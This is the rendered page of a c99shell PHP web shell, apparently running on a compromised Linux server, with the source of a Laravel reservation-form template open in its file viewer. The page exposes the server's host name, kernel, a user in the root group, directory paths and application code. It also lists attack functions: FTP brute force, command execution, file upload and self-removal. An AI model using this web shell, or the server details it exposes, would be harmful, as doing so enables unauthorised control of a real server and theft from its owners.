!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/storage/framework/views/   drwxrwxr-x
Free 26.62 GB of 117.98 GB (22.56%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     510e9ccc70867745b5d7964b2aca5c87b8259447.php (2.79 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php echo csrf_field(); ?>
<div>
    <section>
        <div class="row">
            <div class="col-lg-12 mb-3">
                <div class="form-group">
                    <label class="text-label"><?php echo e(trans('layout.restaurant')); ?>*</label>
                    <select name="restaurant_id" class="form-control" required>
                        <?php $__currentLoopData $restaurants$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $restaurant): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                            <option value="<?php echo e($restaurant->id); ?>"
                                <?php echo e(old('restaurant_id'$reservation->restaurant_id ?? '') == $restaurant->id 'selected' ''); ?>>
                                <?php echo e($restaurant->name); ?>

                            </option>
                        <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                    </select>
                </div>

            </div>
            <div class="col-lg-12 mb-3">
                <div class="form-group">
                    <label class="text-label"><?php echo e(trans('layout.date')); ?>*</label>
                    <div class="input-group">
                        <input type="text" id="checkin-datepicker" value="<?php echo e(old('date') ? old('date') : (isset($reservation) ? $reservation->date '')); ?>" name="date" class="form-control" required>
                        <span class="input-group-text" id="checkin-date">
                            <i class="fa fa-calendar"></i>
                        </span>
                    </div>
                </div>
            </div>

            <div class="col-lg-12 mb-3">
                <div class="form-group">
                    <label class="text-label"><?php echo e(trans('layout.party_size')); ?>*</label>
                    <input
                        value="<?php echo e(old('party_size') ? old('party_size') : (isset($reservation) ? $reservation->party_size '')); ?>"
                        type="number" name="party_size" class="form-control" required>
                </div>
            </div>
            <div class="col-lg-12 mb-3">
                <div class="form-group">
                    <label class="text-label"><?php echo e(trans('layout.contact_number')); ?>*</label>
                    <input
                        value="<?php echo e(old('contact_number') ? old('contact_number') : (isset($reservation) ? $reservation->contact_number '')); ?>"
                        type="number" name="contact_number" class="form-control" required>
                </div>
            </div>
        </div>
    </section>

</div>
<?php /**PATH /home/picotech/domains/qr.picotech.app/public_html/resources/views/reservation/form.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--